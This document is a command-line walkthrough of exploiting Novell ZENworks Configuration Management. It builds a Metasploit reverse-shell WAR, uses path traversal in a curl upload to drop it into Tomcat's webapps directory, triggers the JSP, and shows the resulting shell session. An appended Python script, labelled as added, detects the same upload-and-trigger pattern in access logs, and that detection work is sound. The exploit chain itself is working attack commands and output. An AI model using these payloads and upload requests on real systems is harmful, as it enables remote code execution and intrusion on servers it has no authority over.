luser$ ./msfpayload linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 w > shell_reverse_tcp.war
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell_reverse_tcp
Length: 71
Options: LHOST=10.31.33.7,LPORT=443
We list the contents of the WAR to find out the name of the file we will need to send the HTTP request to.
luser$ unzip -l shell_reverse_tcp.war
Archive: shell_reverse_tcp.war
Length Date Time Name
-------- ---- ---- ----
71 04-28-10 22:40 META-INF/MANIFEST.MF
0 04-28-10 22:40 WEB-INF/
285 04-28-10 22:40 WEB-INF/web.xml
1582 04-28-10 22:40 mcyowonbnhrqsyy.jsp
310 04-28-10 22:40 wNaoQNtbYmK.txt
-------- -------
2248 5 files
In another terminal, as root so that it can bind to TCP/443...
root# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=10.31.33.7 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 10.31.33.7:443
[*] Starting the payload handler...
We upload the WAR.
luser$ curl -ivkl 'http://zcm.server/zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/share/tomcat/webapps&filename=zenw.war&overwrite=true' --data-binary @./shell_reverse_tcp.war -H "Content-Type: application/octet-stream"
We make the HTTP request to start the reverse shell.
luser$ curl -ivkl 'http://zcm.server/zenw/mcyowonbnhrqsyy.jsp'
And, magically, the connection shows up in the terminal running msfcli.
[*] Command shell session 1 opened (10.31.33.7:443 -> 10.1.2.3:41221)
whoami
zenworks
pwd
/
netstat -putan | grep 443
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN -
tcp 0 0 10.1.2.3:41221 10.31.33.7:443 ESTABLISHED 4519/sh
pstree
init─┬─acpid
├─console-kit-dae───63*[{console-kit-dae}]
├─cron
├─dbus-daemon
├─java───17*[{java}]
├─java───39*[{java}]
├─jsvc───jsvc─┬─sh
│ └─78*[{jsvc}]
├─klogd
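Detection for the upload-and-trigger sequence above, as an added example that is not part of the original post: it parses constructed combined-format access-log lines, flags /zenworks-fileupload/ requests whose type or filename parameter carries a traversal segment or names a deployable artifact, and correlates a flagged .war upload with later requests into the Tomcat context it creates. The sample log lines, the log format and the parameter names being inspected are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not from the page); the first
# two mirror the upload and trigger requests shown above, the rest are benign.
SAMPLE_LOG = """\
10.31.33.7 - - [28/Apr/2010:22:41:03 +0200] "POST /zenworks-fileupload/?type=application/octet-stream/../../../../../../../opt/novell/zenworks/share/tomcat/webapps&filename=zenw.war&overwrite=true HTTP/1.1" 200 12
10.31.33.7 - - [28/Apr/2010:22:41:09 +0200] "GET /zenw/mcyowonbnhrqsyy.jsp HTTP/1.1" 200 0
10.1.2.50 - - [28/Apr/2010:22:45:00 +0200] "POST /zenworks-fileupload/?type=application/octet-stream&filename=report.txt HTTP/1.1" 200 12
10.1.2.51 - - [28/Apr/2010:22:46:00 +0200] "GET /zenworks/ HTTP/1.1" 200 512
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) ')
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')   # "../" or "..\" as a path segment
DEPLOYABLE_RE = re.compile(r'\.(war|jsp|jspx)$', re.I)  # files Tomcat would deploy or execute

def check_upload(target):
    """Findings for one request target, plus the Tomcat context a flagged .war would create."""
    parts = urlsplit(target)
    findings, context = [], None
    if not unquote(parts.path).startswith('/zenworks-fileupload'):
        return findings, context
    params = parse_qs(parts.query, keep_blank_values=True)
    for key in ('type', 'filename'):
        for value in params.get(key, []):
            value = unquote(value)  # second decode catches double-encoded ../
            if TRAVERSAL_RE.search(value):
                findings.append(f'{key} contains path traversal: {value}')
            if DEPLOYABLE_RE.search(value):
                findings.append(f'{key} names a deployable artifact: {value}')
    name = unquote(params.get('filename', [''])[0])
    if findings and name.lower().endswith('.war'):
        context = '/' + name[:-4].split('/')[-1]  # Tomcat maps zenw.war to /zenw
    return findings, context

def scan(log_text):
    """Return (ip, message) alerts, correlating a traversal upload with hits on its context."""
    alerts, suspect_contexts = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.group('ip'), m.group('target')
        findings, context = check_upload(target)
        alerts += [(ip, f) for f in findings]
        if context:
            suspect_contexts.add(context)
        path = unquote(urlsplit(target).path)
        if any(path.startswith(c + '/') for c in suspect_contexts):
            alerts.append((ip, f'request into context deployed by traversal upload: {path}'))
    return alerts
```

Running `scan(SAMPLE_LOG)` yields three alerts for 10.31.33.7 (traversal in type, .war in filename, and the follow-up JSP request under /zenw/) and none for the benign lines.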
--
Greetings from #linux, your script kiddie channel